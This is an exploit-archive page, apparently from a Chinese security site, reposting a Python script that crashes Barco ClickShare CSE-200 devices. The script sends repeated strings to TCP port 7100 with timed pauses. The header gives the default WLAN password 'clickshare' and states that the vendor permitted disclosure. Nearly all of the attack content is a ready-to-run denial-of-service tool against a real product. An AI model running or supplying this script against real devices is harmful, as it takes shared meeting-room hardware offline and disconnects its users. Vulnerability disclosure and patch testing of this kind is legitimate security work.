首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Barco ClickShare CSE-200 - Remote Denial of Service
来源:florian DOT g DOT hauser AT gmail DOT com 作者:Hauser 发布时间:2018-04-17  
#!/usr/bin/python
 
# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
# Date: 11-04-2018
# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
# Exploit Author: Florian Hauser
# Contact: florian DOT g DOT hauser AT gmail DOT com
# CVE: requested by Barco
# Category: Hardware
 
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Florian Hauser is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Florian Hauser's
#  responsibility.
#  
#  Use them at your own risk!
################
# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
# not only disconnects all clients but also results in a crash of this hardware device
# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
# I got permission from Barco to disclose this vulnerability.
# This affects potentially all other ClickShare products, Barco confirms
 
import socket
import sys
from time import sleep
 
if len(sys.argv) != 2:
    print "Usage: exploit.py <ip>"
    sys.exit(0)
 
 
# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
# 6-7 requests do the job usually
for x in range(1,50):
    #Create a new socket each time because otherwise the service drops the socket
    #Same request cannot be sent several times in sequence
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    #Connect to vulnerable TCP port 7100
    connect=s.connect((str(sys.argv[1]), 7100))
    s.send('some evil string \r\n\n')
    print "Buffer " + str(x) + " sent...\n"
    
    result=s.recv(1024)
    print result
    s.close()
    
    #Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
    sleep(7)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·GNU Beep 1.3 - 'HoleyBeep' Loc
·Microsoft Windows Kernel (Wind
·MikroTik 6.41.4 - FTP daemon D
·Drupal < 7.58 / < 8.3.9 / < 8.
·Drupal < 7.58 / < 8.3.9 / < 8.
·F5 BIG-IP 11.6 SSL Virtual Ser
·SysGauge Pro 4.6.12 Local Buff
·Google Chrome V8 JIT - 'LoadEl
·DVD X Player Standard 5.5.3.9
·CyberArk Password Vault Web Ac
·CyberArk Password Vault < 9.7
·GoldWave 5.70 - Local Buffer O
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved